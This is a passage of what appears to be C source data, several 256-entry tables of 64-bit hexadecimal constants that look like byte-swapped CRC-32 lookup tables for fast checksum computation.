0x8b511cfd00000000, 0xc0da22b700000000, 0x985ac06000000000, 0x31dc96c300000000, 0x695c741400000000, 
0xa7caeb5700000000, 0xff4a098000000000, 0x56cc5f2300000000, 0x0e4cbdf400000000, 0x45c783be00000000, 0x1d47616900000000, 0xb4c137ca00000000, 0xec41d51d00000000, 0x3c9a8c6b00000000, 0x641a6ebc00000000, 0xcd9c381f00000000, 0x951cdac800000000, 0xde97e48200000000, 0x8617065500000000, 0x2f9150f600000000, 0x7711b22100000000, 0xb9872d6200000000, 0xe107cfb500000000, 0x4881991600000000, 0x10017bc100000000, 0x5b8a458b00000000, 0x030aa75c00000000, 0xaa8cf1ff00000000, 0xf20c132800000000, 0x36a1ce7800000000, 0x6e212caf00000000, 0xc7a77a0c00000000, 0x9f2798db00000000, 0xd4aca69100000000, 0x8c2c444600000000, 0x25aa12e500000000, 0x7d2af03200000000, 0xb3bc6f7100000000, 0xeb3c8da600000000, 0x42badb0500000000, 0x1a3a39d200000000, 0x51b1079800000000, 0x0931e54f00000000, 0xa0b7b3ec00000000, 0xf837513b00000000, 0x50d8119a00000000, 0x0858f34d00000000, 0xa1dea5ee00000000, 0xf95e473900000000, 0xb2d5797300000000, 0xea559ba400000000, 0x43d3cd0700000000, 0x1b532fd000000000, 0xd5c5b09300000000, 0x8d45524400000000, 0x24c304e700000000, 0x7c43e63000000000, 0x37c8d87a00000000, 0x6f483aad00000000, 0xc6ce6c0e00000000, 0x9e4e8ed900000000, 0x5ae3538900000000, 0x0263b15e00000000, 0xabe5e7fd00000000, 0xf365052a00000000, 0xb8ee3b6000000000, 0xe06ed9b700000000, 0x49e88f1400000000, 0x11686dc300000000, 0xdffef28000000000, 0x877e105700000000, 0x2ef846f400000000, 0x7678a42300000000, 0x3df39a6900000000, 0x657378be00000000, 0xccf52e1d00000000, 0x9475ccca00000000, 0x44ae95bc00000000, 0x1c2e776b00000000, 0xb5a821c800000000, 0xed28c31f00000000, 0xa6a3fd5500000000, 0xfe231f8200000000, 0x57a5492100000000, 0x0f25abf600000000, 0xc1b334b500000000, 0x9933d66200000000, 0x30b580c100000000, 0x6835621600000000, 0x23be5c5c00000000, 0x7b3ebe8b00000000, 0xd2b8e82800000000, 0x8a380aff00000000, 0x4e95d7af00000000, 0x1615357800000000, 0xbf9363db00000000, 0xe713810c00000000, 0xac98bf4600000000, 0xf4185d9100000000, 0x5d9e0b3200000000, 0x051ee9e500000000, 0xcb8876a600000000, 0x9308947100000000, 0x3a8ec2d200000000, 0x620e200500000000, 
0x29851e4f00000000, 0x7105fc9800000000, 0xd883aa3b00000000, 0x800348ec00000000, 0x783419d700000000, 0x20b4fb0000000000, 0x8932ada300000000, 0xd1b24f7400000000, 0x9a39713e00000000, 0xc2b993e900000000, 0x6b3fc54a00000000, 0x33bf279d00000000, 0xfd29b8de00000000, 0xa5a95a0900000000, 0x0c2f0caa00000000, 0x54afee7d00000000, 0x1f24d03700000000, 0x47a432e000000000, 0xee22644300000000, 0xb6a2869400000000, 0x720f5bc400000000, 0x2a8fb91300000000, 0x8309efb000000000, 0xdb890d6700000000, 0x9002332d00000000, 0xc882d1fa00000000, 0x6104875900000000, 0x3984658e00000000, 0xf712facd00000000, 0xaf92181a00000000, 0x06144eb900000000, 0x5e94ac6e00000000, 0x151f922400000000, 0x4d9f70f300000000, 0xe419265000000000, 0xbc99c48700000000, 0x6c429df100000000, 0x34c27f2600000000, 0x9d44298500000000, 0xc5c4cb5200000000, 0x8e4ff51800000000, 0xd6cf17cf00000000, 0x7f49416c00000000, 0x27c9a3bb00000000, 0xe95f3cf800000000, 0xb1dfde2f00000000, 0x1859888c00000000, 0x40d96a5b00000000, 0x0b52541100000000, 0x53d2b6c600000000, 0xfa54e06500000000, 0xa2d402b200000000, 0x6679dfe200000000, 0x3ef93d3500000000, 0x977f6b9600000000, 0xcfff894100000000, 0x8474b70b00000000, 0xdcf455dc00000000, 0x7572037f00000000, 0x2df2e1a800000000, 0xe3647eeb00000000, 0xbbe49c3c00000000, 0x1262ca9f00000000, 0x4ae2284800000000, 0x0169160200000000, 0x59e9f4d500000000, 0xf06fa27600000000, 0xa8ef40a100000000}, {0x0000000000000000, 0x463b676500000000, 0x8c76ceca00000000, 0xca4da9af00000000, 0x59ebed4e00000000, 0x1fd08a2b00000000, 0xd59d238400000000, 0x93a644e100000000, 0xb2d6db9d00000000, 0xf4edbcf800000000, 0x3ea0155700000000, 0x789b723200000000, 0xeb3d36d300000000, 0xad0651b600000000, 0x674bf81900000000, 0x21709f7c00000000, 0x25abc6e000000000, 0x6390a18500000000, 0xa9dd082a00000000, 0xefe66f4f00000000, 0x7c402bae00000000, 0x3a7b4ccb00000000, 0xf036e56400000000, 0xb60d820100000000, 0x977d1d7d00000000, 0xd1467a1800000000, 0x1b0bd3b700000000, 0x5d30b4d200000000, 0xce96f03300000000, 0x88ad975600000000, 0x42e03ef900000000, 
0x04db599c00000000, 0x0b50fc1a00000000, 0x4d6b9b7f00000000, 0x872632d000000000, 0xc11d55b500000000, 0x52bb115400000000, 0x1480763100000000, 0xdecddf9e00000000, 0x98f6b8fb00000000, 0xb986278700000000, 0xffbd40e200000000, 0x35f0e94d00000000, 0x73cb8e2800000000, 0xe06dcac900000000, 0xa656adac00000000, 0x6c1b040300000000, 0x2a20636600000000, 0x2efb3afa00000000, 0x68c05d9f00000000, 0xa28df43000000000, 0xe4b6935500000000, 0x7710d7b400000000, 0x312bb0d100000000, 0xfb66197e00000000, 0xbd5d7e1b00000000, 0x9c2de16700000000, 0xda16860200000000, 0x105b2fad00000000, 0x566048c800000000, 0xc5c60c2900000000, 0x83fd6b4c00000000, 0x49b0c2e300000000, 0x0f8ba58600000000, 0x16a0f83500000000, 0x509b9f5000000000, 0x9ad636ff00000000, 0xdced519a00000000, 0x4f4b157b00000000, 0x0970721e00000000, 0xc33ddbb100000000, 0x8506bcd400000000, 0xa47623a800000000, 0xe24d44cd00000000, 0x2800ed6200000000, 0x6e3b8a0700000000, 0xfd9dcee600000000, 0xbba6a98300000000, 0x71eb002c00000000, 0x37d0674900000000, 0x330b3ed500000000, 0x753059b000000000, 0xbf7df01f00000000, 0xf946977a00000000, 0x6ae0d39b00000000, 0x2cdbb4fe00000000, 0xe6961d5100000000, 0xa0ad7a3400000000, 0x81dde54800000000, 0xc7e6822d00000000, 0x0dab2b8200000000, 0x4b904ce700000000, 0xd836080600000000, 0x9e0d6f6300000000, 0x5440c6cc00000000, 0x127ba1a900000000, 0x1df0042f00000000, 0x5bcb634a00000000, 0x9186cae500000000, 0xd7bdad8000000000, 0x441be96100000000, 0x02208e0400000000, 0xc86d27ab00000000, 0x8e5640ce00000000, 0xaf26dfb200000000, 0xe91db8d700000000, 0x2350117800000000, 0x656b761d00000000, 0xf6cd32fc00000000, 0xb0f6559900000000, 0x7abbfc3600000000, 0x3c809b5300000000, 0x385bc2cf00000000, 0x7e60a5aa00000000, 0xb42d0c0500000000, 0xf2166b6000000000, 0x61b02f8100000000, 0x278b48e400000000, 0xedc6e14b00000000, 0xabfd862e00000000, 0x8a8d195200000000, 0xccb67e3700000000, 0x06fbd79800000000, 0x40c0b0fd00000000, 0xd366f41c00000000, 0x955d937900000000, 0x5f103ad600000000, 0x192b5db300000000, 0x2c40f16b00000000, 0x6a7b960e00000000, 0xa0363fa100000000, 
0xe60d58c400000000, 0x75ab1c2500000000, 0x33907b4000000000, 0xf9ddd2ef00000000, 0xbfe6b58a00000000, 0x9e962af600000000, 0xd8ad4d9300000000, 0x12e0e43c00000000, 0x54db835900000000, 0xc77dc7b800000000, 0x8146a0dd00000000, 0x4b0b097200000000, 0x0d306e1700000000, 0x09eb378b00000000, 0x4fd050ee00000000, 0x859df94100000000, 0xc3a69e2400000000, 0x5000dac500000000, 0x163bbda000000000, 0xdc76140f00000000, 0x9a4d736a00000000, 0xbb3dec1600000000, 0xfd068b7300000000, 0x374b22dc00000000, 0x717045b900000000, 0xe2d6015800000000, 0xa4ed663d00000000, 0x6ea0cf9200000000, 0x289ba8f700000000, 0x27100d7100000000, 0x612b6a1400000000, 0xab66c3bb00000000, 0xed5da4de00000000, 0x7efbe03f00000000, 0x38c0875a00000000, 0xf28d2ef500000000, 0xb4b6499000000000, 0x95c6d6ec00000000, 0xd3fdb18900000000, 0x19b0182600000000, 0x5f8b7f4300000000, 0xcc2d3ba200000000, 0x8a165cc700000000, 0x405bf56800000000, 0x0660920d00000000, 0x02bbcb9100000000, 0x4480acf400000000, 0x8ecd055b00000000, 0xc8f6623e00000000, 0x5b5026df00000000, 0x1d6b41ba00000000, 0xd726e81500000000, 0x911d8f7000000000, 0xb06d100c00000000, 0xf656776900000000, 0x3c1bdec600000000, 0x7a20b9a300000000, 0xe986fd4200000000, 0xafbd9a2700000000, 0x65f0338800000000, 0x23cb54ed00000000, 0x3ae0095e00000000, 0x7cdb6e3b00000000, 0xb696c79400000000, 0xf0ada0f100000000, 0x630be41000000000, 0x2530837500000000, 0xef7d2ada00000000, 0xa9464dbf00000000, 0x8836d2c300000000, 0xce0db5a600000000, 0x04401c0900000000, 0x427b7b6c00000000, 0xd1dd3f8d00000000, 0x97e658e800000000, 0x5dabf14700000000, 0x1b90962200000000, 0x1f4bcfbe00000000, 0x5970a8db00000000, 0x933d017400000000, 0xd506661100000000, 0x46a022f000000000, 0x009b459500000000, 0xcad6ec3a00000000, 0x8ced8b5f00000000, 0xad9d142300000000, 0xeba6734600000000, 0x21ebdae900000000, 0x67d0bd8c00000000, 0xf476f96d00000000, 0xb24d9e0800000000, 0x780037a700000000, 0x3e3b50c200000000, 0x31b0f54400000000, 0x778b922100000000, 0xbdc63b8e00000000, 0xfbfd5ceb00000000, 0x685b180a00000000, 0x2e607f6f00000000, 0xe42dd6c000000000, 
0xa216b1a500000000, 0x83662ed900000000, 0xc55d49bc00000000, 0x0f10e01300000000, 0x492b877600000000, 0xda8dc39700000000, 0x9cb6a4f200000000, 0x56fb0d5d00000000, 0x10c06a3800000000, 0x141b33a400000000, 0x522054c100000000, 0x986dfd6e00000000, 0xde569a0b00000000, 0x4df0deea00000000, 0x0bcbb98f00000000, 0xc186102000000000, 0x87bd774500000000, 0xa6cde83900000000, 0xe0f68f5c00000000, 0x2abb26f300000000, 0x6c80419600000000, 0xff26057700000000, 0xb91d621200000000, 0x7350cbbd00000000, 0x356bacd800000000}, {0x0000000000000000, 0x9e83da9f00000000, 0x7d01c4e400000000, 0xe3821e7b00000000, 0xbb04f91200000000, 0x2587238d00000000, 0xc6053df600000000, 0x5886e76900000000, 0x7609f22500000000, 0xe88a28ba00000000, 0x0b0836c100000000, 0x958bec5e00000000, 0xcd0d0b3700000000, 0x538ed1a800000000, 0xb00ccfd300000000, 0x2e8f154c00000000, 0xec12e44b00000000, 0x72913ed400000000, 0x911320af00000000, 0x0f90fa3000000000, 0x57161d5900000000, 0xc995c7c600000000, 0x2a17d9bd00000000, 0xb494032200000000, 0x9a1b166e00000000, 0x0498ccf100000000, 0xe71ad28a00000000, 0x7999081500000000, 0x211fef7c00000000, 0xbf9c35e300000000, 0x5c1e2b9800000000, 0xc29df10700000000, 0xd825c89700000000, 0x46a6120800000000, 0xa5240c7300000000, 0x3ba7d6ec00000000, 0x6321318500000000, 0xfda2eb1a00000000, 0x1e20f56100000000, 0x80a32ffe00000000, 0xae2c3ab200000000, 0x30afe02d00000000, 0xd32dfe5600000000, 0x4dae24c900000000, 0x1528c3a000000000, 0x8bab193f00000000, 0x6829074400000000, 0xf6aadddb00000000, 0x34372cdc00000000, 0xaab4f64300000000, 0x4936e83800000000, 0xd7b532a700000000, 0x8f33d5ce00000000, 0x11b00f5100000000, 0xf232112a00000000, 0x6cb1cbb500000000, 0x423edef900000000, 0xdcbd046600000000, 0x3f3f1a1d00000000, 0xa1bcc08200000000, 0xf93a27eb00000000, 0x67b9fd7400000000, 0x843be30f00000000, 0x1ab8399000000000, 0xf14de1f400000000, 0x6fce3b6b00000000, 0x8c4c251000000000, 0x12cfff8f00000000, 0x4a4918e600000000, 0xd4cac27900000000, 0x3748dc0200000000, 0xa9cb069d00000000, 0x874413d100000000, 0x19c7c94e00000000, 
0xfa45d73500000000, 0x64c60daa00000000, 0x3c40eac300000000, 0xa2c3305c00000000, 0x41412e2700000000, 0xdfc2f4b800000000, 0x1d5f05bf00000000, 0x83dcdf2000000000, 0x605ec15b00000000, 0xfedd1bc400000000, 0xa65bfcad00000000, 0x38d8263200000000, 0xdb5a384900000000, 0x45d9e2d600000000, 0x6b56f79a00000000, 0xf5d52d0500000000, 0x1657337e00000000, 0x88d4e9e100000000, 0xd0520e8800000000, 0x4ed1d41700000000, 0xad53ca6c00000000, 0x33d010f300000000, 0x2968296300000000, 0xb7ebf3fc00000000, 0x5469ed8700000000, 0xcaea371800000000, 0x926cd07100000000, 0x0cef0aee00000000, 0xef6d149500000000, 0x71eece0a00000000, 0x5f61db4600000000, 0xc1e201d900000000, 0x22601fa200000000, 0xbce3c53d00000000, 0xe465225400000000, 0x7ae6f8cb00000000, 0x9964e6b000000000, 0x07e73c2f00000000, 0xc57acd2800000000, 0x5bf917b700000000, 0xb87b09cc00000000, 0x26f8d35300000000, 0x7e7e343a00000000, 0xe0fdeea500000000, 0x037ff0de00000000, 0x9dfc2a4100000000, 0xb3733f0d00000000, 0x2df0e59200000000, 0xce72fbe900000000, 0x50f1217600000000, 0x0877c61f00000000, 0x96f41c8000000000, 0x757602fb00000000, 0xebf5d86400000000, 0xa39db33200000000, 0x3d1e69ad00000000, 0xde9c77d600000000, 0x401fad4900000000, 0x18994a2000000000, 0x861a90bf00000000, 0x65988ec400000000, 0xfb1b545b00000000, 0xd594411700000000, 0x4b179b8800000000, 0xa89585f300000000, 0x36165f6c00000000, 0x6e90b80500000000, 0xf013629a00000000, 0x13917ce100000000, 0x8d12a67e00000000, 0x4f8f577900000000, 0xd10c8de600000000, 0x328e939d00000000, 0xac0d490200000000, 0xf48bae6b00000000, 0x6a0874f400000000, 0x898a6a8f00000000, 0x1709b01000000000, 0x3986a55c00000000, 0xa7057fc300000000, 0x448761b800000000, 0xda04bb2700000000, 0x82825c4e00000000, 0x1c0186d100000000, 0xff8398aa00000000, 0x6100423500000000, 0x7bb87ba500000000, 0xe53ba13a00000000, 0x06b9bf4100000000, 0x983a65de00000000, 0xc0bc82b700000000, 0x5e3f582800000000, 0xbdbd465300000000, 0x233e9ccc00000000, 0x0db1898000000000, 0x9332531f00000000, 0x70b04d6400000000, 0xee3397fb00000000, 0xb6b5709200000000, 0x2836aa0d00000000, 
0xcbb4b47600000000, 0x55376ee900000000, 0x97aa9fee00000000, 0x0929457100000000, 0xeaab5b0a00000000, 0x7428819500000000, 0x2cae66fc00000000, 0xb22dbc6300000000, 0x51afa21800000000, 0xcf2c788700000000, 0xe1a36dcb00000000, 0x7f20b75400000000, 0x9ca2a92f00000000, 0x022173b000000000, 0x5aa794d900000000, 0xc4244e4600000000, 0x27a6503d00000000, 0xb9258aa200000000, 0x52d052c600000000, 0xcc53885900000000, 0x2fd1962200000000, 0xb1524cbd00000000, 0xe9d4abd400000000, 0x7757714b00000000, 0x94d56f3000000000, 0x0a56b5af00000000, 0x24d9a0e300000000, 0xba5a7a7c00000000, 0x59d8640700000000, 0xc75bbe9800000000, 0x9fdd59f100000000, 0x015e836e00000000, 0xe2dc9d1500000000, 0x7c5f478a00000000, 0xbec2b68d00000000, 0x20416c1200000000, 0xc3c3726900000000, 0x5d40a8f600000000, 0x05c64f9f00000000, 0x9b45950000000000, 0x78c78b7b00000000, 0xe64451e400000000, 0xc8cb44a800000000, 0x56489e3700000000, 0xb5ca804c00000000, 0x2b495ad300000000, 0x73cfbdba00000000, 0xed4c672500000000, 0x0ece795e00000000, 0x904da3c100000000, 0x8af59a5100000000, 0x147640ce00000000, 0xf7f45eb500000000, 0x6977842a00000000, 0x31f1634300000000, 0xaf72b9dc00000000, 0x4cf0a7a700000000, 0xd2737d3800000000, 0xfcfc687400000000, 0x627fb2eb00000000, 0x81fdac9000000000, 0x1f7e760f00000000, 0x47f8916600000000, 0xd97b4bf900000000, 0x3af9558200000000, 0xa47a8f1d00000000, 0x66e77e1a00000000, 0xf864a48500000000, 0x1be6bafe00000000, 0x8565606100000000, 0xdde3870800000000, 0x43605d9700000000, 0xa0e243ec00000000, 0x3e61997300000000, 0x10ee8c3f00000000, 0x8e6d56a000000000, 0x6def48db00000000, 0xf36c924400000000, 0xabea752d00000000, 0x3569afb200000000, 0xd6ebb1c900000000, 0x48686b5600000000}, {0x0000000000000000, 0xc064281700000000, 0x80c9502e00000000, 0x40ad783900000000, 0x0093a15c00000000, 0xc0f7894b00000000, 0x805af17200000000, 0x403ed96500000000, 0x002643b900000000, 0xc0426bae00000000, 0x80ef139700000000, 0x408b3b8000000000, 0x00b5e2e500000000, 0xc0d1caf200000000, 0x807cb2cb00000000, 0x40189adc00000000, 0x414af7a900000000, 
0x812edfbe00000000, 0xc183a78700000000, 0x01e78f9000000000, 0x41d956f500000000, 0x81bd7ee200000000, 0xc11006db00000000, 0x01742ecc00000000, 0x416cb41000000000, 0x81089c0700000000, 0xc1a5e43e00000000, 0x01c1cc2900000000, 0x41ff154c00000000, 0x819b3d5b00000000, 0xc136456200000000, 0x01526d7500000000, 0xc3929f8800000000, 0x03f6b79f00000000, 0x435bcfa600000000, 0x833fe7b100000000, 0xc3013ed400000000, 0x036516c300000000, 0x43c86efa00000000, 0x83ac46ed00000000, 0xc3b4dc3100000000, 0x03d0f42600000000, 0x437d8c1f00000000, 0x8319a40800000000, 0xc3277d6d00000000, 0x0343557a00000000, 0x43ee2d4300000000, 0x838a055400000000, 0x82d8682100000000, 0x42bc403600000000, 0x0211380f00000000, 0xc275101800000000, 0x824bc97d00000000, 0x422fe16a00000000, 0x0282995300000000, 0xc2e6b14400000000, 0x82fe2b9800000000, 0x429a038f00000000, 0x02377bb600000000, 0xc25353a100000000, 0x826d8ac400000000, 0x4209a2d300000000, 0x02a4daea00000000, 0xc2c0f2fd00000000, 0xc7234eca00000000, 0x074766dd00000000, 0x47ea1ee400000000, 0x878e36f300000000, 0xc7b0ef9600000000, 0x07d4c78100000000, 0x4779bfb800000000, 0x871d97af00000000, 0xc7050d7300000000, 0x0761256400000000, 0x47cc5d5d00000000, 0x87a8754a00000000, 0xc796ac2f00000000, 0x07f2843800000000, 0x475ffc0100000000, 0x873bd41600000000, 0x8669b96300000000, 0x460d917400000000, 0x06a0e94d00000000, 0xc6c4c15a00000000, 0x86fa183f00000000, 0x469e302800000000, 0x0633481100000000, 0xc657600600000000, 0x864ffada00000000, 0x462bd2cd00000000, 0x0686aaf400000000, 0xc6e282e300000000, 0x86dc5b8600000000, 0x46b8739100000000, 0x06150ba800000000, 0xc67123bf00000000, 0x04b1d14200000000, 0xc4d5f95500000000, 0x8478816c00000000, 0x441ca97b00000000, 0x0422701e00000000, 0xc446580900000000, 0x84eb203000000000, 0x448f082700000000, 0x049792fb00000000, 0xc4f3baec00000000, 0x845ec2d500000000, 0x443aeac200000000, 0x040433a700000000, 0xc4601bb000000000, 0x84cd638900000000, 0x44a94b9e00000000, 0x45fb26eb00000000, 0x859f0efc00000000, 0xc53276c500000000, 0x05565ed200000000, 0x456887b700000000, 
0x850cafa000000000, 0xc5a1d79900000000, 0x05c5ff8e00000000, 0x45dd655200000000, 0x85b94d4500000000, 0xc514357c00000000, 0x05701d6b00000000, 0x454ec40e00000000, 0x852aec1900000000, 0xc587942000000000, 0x05e3bc3700000000, 0xcf41ed4f00000000, 0x0f25c55800000000, 0x4f88bd6100000000, 0x8fec957600000000, 0xcfd24c1300000000, 0x0fb6640400000000, 0x4f1b1c3d00000000, 0x8f7f342a00000000, 0xcf67aef600000000, 0x0f0386e100000000, 0x4faefed800000000, 0x8fcad6cf00000000, 0xcff40faa00000000, 0x0f9027bd00000000, 0x4f3d5f8400000000, 0x8f59779300000000, 0x8e0b1ae600000000, 0x4e6f32f100000000, 0x0ec24ac800000000, 0xcea662df00000000, 0x8e98bbba00000000, 0x4efc93ad00000000, 0x0e51eb9400000000, 0xce35c38300000000, 0x8e2d595f00000000, 0x4e49714800000000, 0x0ee4097100000000, 0xce80216600000000, 0x8ebef80300000000, 0x4edad01400000000, 0x0e77a82d00000000, 0xce13803a00000000, 0x0cd372c700000000, 0xccb75ad000000000, 0x8c1a22e900000000, 0x4c7e0afe00000000, 0x0c40d39b00000000, 0xcc24fb8c00000000, 0x8c8983b500000000, 0x4cedaba200000000, 0x0cf5317e00000000, 0xcc91196900000000, 0x8c3c615000000000, 0x4c58494700000000, 0x0c66902200000000, 0xcc02b83500000000, 0x8cafc00c00000000, 0x4ccbe81b00000000, 0x4d99856e00000000, 0x8dfdad7900000000, 0xcd50d54000000000, 0x0d34fd5700000000, 0x4d0a243200000000, 0x8d6e0c2500000000, 0xcdc3741c00000000, 0x0da75c0b00000000, 0x4dbfc6d700000000, 0x8ddbeec000000000, 0xcd7696f900000000, 0x0d12beee00000000, 0x4d2c678b00000000, 0x8d484f9c00000000, 0xcde537a500000000, 0x0d811fb200000000, 0x0862a38500000000, 0xc8068b9200000000, 0x88abf3ab00000000, 0x48cfdbbc00000000, 0x08f102d900000000, 0xc8952ace00000000, 0x883852f700000000, 0x485c7ae000000000, 0x0844e03c00000000, 0xc820c82b00000000, 0x888db01200000000, 0x48e9980500000000, 0x08d7416000000000, 0xc8b3697700000000, 0x881e114e00000000, 0x487a395900000000, 0x4928542c00000000, 0x894c7c3b00000000, 0xc9e1040200000000, 0x09852c1500000000, 0x49bbf57000000000, 0x89dfdd6700000000, 0xc972a55e00000000, 0x09168d4900000000, 0x490e179500000000, 
0x896a3f8200000000, 0xc9c747bb00000000, 0x09a36fac00000000, 0x499db6c900000000, 0x89f99ede00000000, 0xc954e6e700000000, 0x0930cef000000000, 0xcbf03c0d00000000, 0x0b94141a00000000, 0x4b396c2300000000, 0x8b5d443400000000, 0xcb639d5100000000, 0x0b07b54600000000, 0x4baacd7f00000000, 0x8bcee56800000000, 0xcbd67fb400000000, 0x0bb257a300000000, 0x4b1f2f9a00000000, 0x8b7b078d00000000, 0xcb45dee800000000, 0x0b21f6ff00000000, 0x4b8c8ec600000000, 0x8be8a6d100000000, 0x8abacba400000000, 0x4adee3b300000000, 0x0a739b8a00000000, 0xca17b39d00000000, 0x8a296af800000000, 0x4a4d42ef00000000, 0x0ae03ad600000000, 0xca8412c100000000, 0x8a9c881d00000000, 0x4af8a00a00000000, 0x0a55d83300000000, 0xca31f02400000000, 0x8a0f294100000000, 0x4a6b015600000000, 0x0ac6796f00000000, 0xcaa2517800000000}, {0x0000000000000000, 0xd4ea739b00000000, 0xe9d396ed00000000, 0x3d39e57600000000, 0x93a15c0000000000, 0x474b2f9b00000000, 0x7a72caed00000000, 0xae98b97600000000, 0x2643b90000000000, 0xf2a9ca9b00000000, 0xcf902fed00000000, 0x1b7a5c7600000000, 0xb5e2e50000000000, 0x6108969b00000000, 0x5c3173ed00000000, 0x88db007600000000, 0x4c86720100000000, 0x986c019a00000000, 0xa555e4ec00000000, 0x71bf977700000000, 0xdf272e0100000000, 0x0bcd5d9a00000000, 0x36f4b8ec00000000, 0xe21ecb7700000000, 0x6ac5cb0100000000, 0xbe2fb89a00000000, 0x83165dec00000000, 0x57fc2e7700000000, 0xf964970100000000, 0x2d8ee49a00000000, 0x10b701ec00000000, 0xc45d727700000000, 0x980ce50200000000, 0x4ce6969900000000, 0x71df73ef00000000, 0xa535007400000000, 0x0badb90200000000, 0xdf47ca9900000000, 0xe27e2fef00000000, 0x36945c7400000000, 0xbe4f5c0200000000, 0x6aa52f9900000000, 0x579ccaef00000000, 0x8376b97400000000, 0x2dee000200000000, 0xf904739900000000, 0xc43d96ef00000000, 0x10d7e57400000000, 0xd48a970300000000, 0x0060e49800000000, 0x3d5901ee00000000, 0xe9b3727500000000, 0x472bcb0300000000, 0x93c1b89800000000, 0xaef85dee00000000, 0x7a122e7500000000, 0xf2c92e0300000000, 0x26235d9800000000, 0x1b1ab8ee00000000, 0xcff0cb7500000000, 
0x6168720300000000, 0xb582019800000000, 0x88bbe4ee00000000, 0x5c51977500000000, 0x3019ca0500000000, 0xe4f3b99e00000000, 0xd9ca5ce800000000, 0x0d202f7300000000, 0xa3b8960500000000, 0x7752e59e00000000, 0x4a6b00e800000000, 0x9e81737300000000, 0x165a730500000000, 0xc2b0009e00000000, 0xff89e5e800000000, 0x2b63967300000000, 0x85fb2f0500000000, 0x51115c9e00000000, 0x6c28b9e800000000, 0xb8c2ca7300000000, 0x7c9fb80400000000, 0xa875cb9f00000000, 0x954c2ee900000000, 0x41a65d7200000000, 0xef3ee40400000000, 0x3bd4979f00000000, 0x06ed72e900000000, 0xd207017200000000, 0x5adc010400000000, 0x8e36729f00000000, 0xb30f97e900000000, 0x67e5e47200000000, 0xc97d5d0400000000, 0x1d972e9f00000000, 0x20aecbe900000000, 0xf444b87200000000, 0xa8152f0700000000, 0x7cff5c9c00000000, 0x41c6b9ea00000000, 0x952cca7100000000, 0x3bb4730700000000, 0xef5e009c00000000, 0xd267e5ea00000000, 0x068d967100000000, 0x8e56960700000000, 0x5abce59c00000000, 0x678500ea00000000, 0xb36f737100000000, 0x1df7ca0700000000, 0xc91db99c00000000, 0xf4245cea00000000, 0x20ce2f7100000000, 0xe4935d0600000000, 0x30792e9d00000000, 0x0d40cbeb00000000, 0xd9aab87000000000, 0x7732010600000000, 0xa3d8729d00000000, 0x9ee197eb00000000, 0x4a0be47000000000, 0xc2d0e40600000000, 0x163a979d00000000, 0x2b0372eb00000000, 0xffe9017000000000, 0x5171b80600000000, 0x859bcb9d00000000, 0xb8a22eeb00000000, 0x6c485d7000000000, 0x6032940b00000000, 0xb4d8e79000000000, 0x89e102e600000000, 0x5d0b717d00000000, 0xf393c80b00000000, 0x2779bb9000000000, 0x1a405ee600000000, 0xceaa2d7d00000000, 0x46712d0b00000000, 0x929b5e9000000000, 0xafa2bbe600000000, 0x7b48c87d00000000, 0xd5d0710b00000000, 0x013a029000000000, 0x3c03e7e600000000, 0xe8e9947d00000000, 0x2cb4e60a00000000, 0xf85e959100000000, 0xc56770e700000000, 0x118d037c00000000, 0xbf15ba0a00000000, 0x6bffc99100000000, 0x56c62ce700000000, 0x822c5f7c00000000, 0x0af75f0a00000000, 0xde1d2c9100000000, 0xe324c9e700000000, 0x37ceba7c00000000, 0x9956030a00000000, 0x4dbc709100000000, 0x708595e700000000, 0xa46fe67c00000000, 
0xf83e710900000000, 0x2cd4029200000000, 0x11ede7e400000000, 0xc507947f00000000, 0x6b9f2d0900000000, 0xbf755e9200000000, 0x824cbbe400000000, 0x56a6c87f00000000, 0xde7dc80900000000, 0x0a97bb9200000000, 0x37ae5ee400000000, 0xe3442d7f00000000, 0x4ddc940900000000, 0x9936e79200000000, 0xa40f02e400000000, 0x70e5717f00000000, 0xb4b8030800000000, 0x6052709300000000, 0x5d6b95e500000000, 0x8981e67e00000000, 0x27195f0800000000, 0xf3f32c9300000000, 0xcecac9e500000000, 0x1a20ba7e00000000, 0x92fbba0800000000, 0x4611c99300000000, 0x7b282ce500000000, 0xafc25f7e00000000, 0x015ae60800000000, 0xd5b0959300000000, 0xe88970e500000000, 0x3c63037e00000000, 0x502b5e0e00000000, 0x84c12d9500000000, 0xb9f8c8e300000000, 0x6d12bb7800000000, 0xc38a020e00000000, 0x1760719500000000, 0x2a5994e300000000, 0xfeb3e77800000000, 0x7668e70e00000000, 0xa282949500000000, 0x9fbb71e300000000, 0x4b51027800000000, 0xe5c9bb0e00000000, 0x3123c89500000000, 0x0c1a2de300000000, 0xd8f05e7800000000, 0x1cad2c0f00000000, 0xc8475f9400000000, 0xf57ebae200000000, 0x2194c97900000000, 0x8f0c700f00000000, 0x5be6039400000000, 0x66dfe6e200000000, 0xb235957900000000, 0x3aee950f00000000, 0xee04e69400000000, 0xd33d03e200000000, 0x07d7707900000000, 0xa94fc90f00000000, 0x7da5ba9400000000, 0x409c5fe200000000, 0x94762c7900000000, 0xc827bb0c00000000, 0x1ccdc89700000000, 0x21f42de100000000, 0xf51e5e7a00000000, 0x5b86e70c00000000, 0x8f6c949700000000, 0xb25571e100000000, 0x66bf027a00000000, 0xee64020c00000000, 0x3a8e719700000000, 0x07b794e100000000, 0xd35de77a00000000, 0x7dc55e0c00000000, 0xa92f2d9700000000, 0x9416c8e100000000, 0x40fcbb7a00000000, 0x84a1c90d00000000, 0x504bba9600000000, 0x6d725fe000000000, 0xb9982c7b00000000, 0x1700950d00000000, 0xc3eae69600000000, 0xfed303e000000000, 0x2a39707b00000000, 0xa2e2700d00000000, 0x7608039600000000, 0x4b31e6e000000000, 0x9fdb957b00000000, 0x31432c0d00000000, 0xe5a95f9600000000, 0xd890bae000000000, 0x0c7ac97b00000000}, {0x0000000000000000, 0x2765258100000000, 0x0fcc3bd900000000, 
